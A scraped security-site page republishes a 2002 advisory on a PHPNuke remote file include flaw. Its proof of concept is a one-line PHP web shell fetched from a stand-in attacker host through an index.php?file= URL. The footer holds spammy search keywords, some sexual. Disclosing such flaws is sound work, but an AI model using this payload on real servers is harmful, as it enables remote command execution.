exploits , vulnerabilities , articles , PHPNuke Remote Arbitrary File Include Vulnerability

Title	PHPNuke Remote Arbitrary File Include Vulnerability
Published	2002-01-16-12:00AM
Updated	2002-01-16-08:29PM
Class	Input Validation Error
CVE	CAN-2002-0206
Remote	Yes
Local	No
Credit	This vulnerability was submitted to BugTraq on January 16th, 2002 by "Handle Nopman" <nopman@hackermail.com>.
Vulnerable	Francisco Burzi PHPNuke 5.3.1 Francisco Burzi PHPNuke 5.2 a Francisco Burzi PHPNuke 5.2 Francisco Burzi PHPNuke 5.1 Francisco Burzi PHPNuke 5.0.1 Francisco Burzi PHPNuke 5.0 Francisco Burzi PHPNuke 4.4.1 a Francisco Burzi PHPNuke 4.4 Francisco Burzi PHPNuke 4.3 Francisco Burzi PHPNuke 4.0 Francisco Burzi PHPNuke 3.0 Linux kernel 2.2 Francisco Burzi PHPNuke 2.5 Francisco Burzi PHPNuke 1.0
Not Vulnerable
Code	Create the following file on a remote server: <?php system($cmd); ?> The following URL will include the malicious file and allow the attacker to execute the "la -la" command on the shell of the host running PHPNuke: http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-19 Serv-U File Server User Directory Information Disclosure Vulnerability
2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 04:51:28 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c linux loca jx61.net www.12cr1m rape galle gta5.0d.0a nude anna 2.2.24-6.2 Www.indian Play video Www live s DownloadSe photoshop Hi friends Malayalams Sabdrimer news for c ycw919.cn Tamil act functions. forma Www.fuking Gay Pictur 200 /compo Spruz sri lankan Linux qbe maxcpm.inf digital mu Www.Xnx.Co sex arab l Wwwsex.xx news for C TIRISA www.huangw News+Searc films thottbot.c Crack Data www.wzdsw. tren xp exploit sex vedo I agree wi bbs.px101. sexy%2Bvid news for C www.ke360. t691t news for c